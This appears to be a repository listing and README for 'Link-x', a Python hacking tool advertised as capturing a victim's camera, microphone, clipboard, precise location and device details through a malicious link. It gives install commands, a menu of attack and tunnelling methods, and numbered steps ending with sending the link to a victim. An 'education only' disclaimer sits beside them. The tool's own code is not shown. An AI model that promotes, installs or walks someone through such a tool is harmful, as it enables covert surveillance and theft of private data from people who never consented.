https://github.com/whomrx666/link-x
This Tool can Hack and Grab data of Camera, Voice, Clipboard, Location.It can Grab As much info as Possible from Victims Device.All this requires Just a Malicious Link
https://github.com/whomrx666/link-x
ethical-hacking hack-with-link hacking-tool kali-linux link-x linux malicious-link termux
Last synced: 2 months ago
JSON representation
This Tool can Hack and Grab data of Camera, Voice, Clipboard, Location.It can Grab As much info as Possible from Victims Device.All this requires Just a Malicious Link
- Host: GitHub
- URL: https://github.com/whomrx666/link-x
- Owner: Whomrx666
- Created: 2023-12-09T05:26:56.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-02-12T06:24:43.000Z (3 months ago)
- Last Synced: 2025-02-12T07:40:39.692Z (3 months ago)
- Topics: ethical-hacking, hack-with-link, hacking-tool, kali-linux, link-x, linux, malicious-link, termux
- Language: Python
- Homepage: https://whomrxhackers.blogspot.com/
- Size: 455 KB
- Stars: 22
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Link-x
## introduction
This Tool can Hack and Grab data of Camera, Voice, Clipboard, Location.It can Grab As much info as Possible from Victims Device.All this requires Just a Malicious Link## Instalations
```
$ apt update -y
$ apt upgrade -y
$ pkg install python git -y
$ git clone https://github.com/Whomrx666/Link-x
$ cd Link-x
$ python setup.py
$ python Link-x.py
```
### Attack Methods:
* Camera
* Voice
* Clipboard
* Location
* Paste Jacking### Tunnel Methods:
* Localhost (For developers)
* Ngrok (5 Trials)
* Cloudflared (Best Usages)### Methods Overview:
* Camera
> Hack Victim's front Camera and take pictures every (2/3) seconds
* Voice
> Hack Victim's Microphone and Record 5 Seconds audio
* Clipboard
> Hack Victim's Clipboard and Grab last copied Text
* Location
> Hack Victim's Location and Show exact Location
* Paste Jacking
> Not actually a hacking Method. Show a Text, and Copy another Text
* Device Details
> Probably my favorite Attack Method. Grab the much Information as possible from Victim's Device. Including: Screen Info, Battery Info, Connection Info, Country Info etc...## Instructions
- **One**: Install the tools then choose what attack you will carry out
- **Two**: After that, select the tunnel method that you will run
- **Three**: Create a link according to what you want or use the default link, it's up to you
- **Four**: Send the link to the victim and wait for the victim to open it
- **Done**: And boom you will get what you want## Observation
This is a tool for education only, I am not responsible for any misuse
### Original Author## CONNECT WITH ME :
[](https://whomrxhackers.blogspot.com/)
[](https://twitter.com/whomrx666)
[](https://youtube.com/@whomrxhackers)
[](https://facebook.com/https://www.facebook.com/whomrx.666)
[](https://t.me/Whomr_X)
[](mailto:[email protected])
[](https://www.tiktok.com/@whomr.x)**If you want to donate, click on the button**
### Visitors :
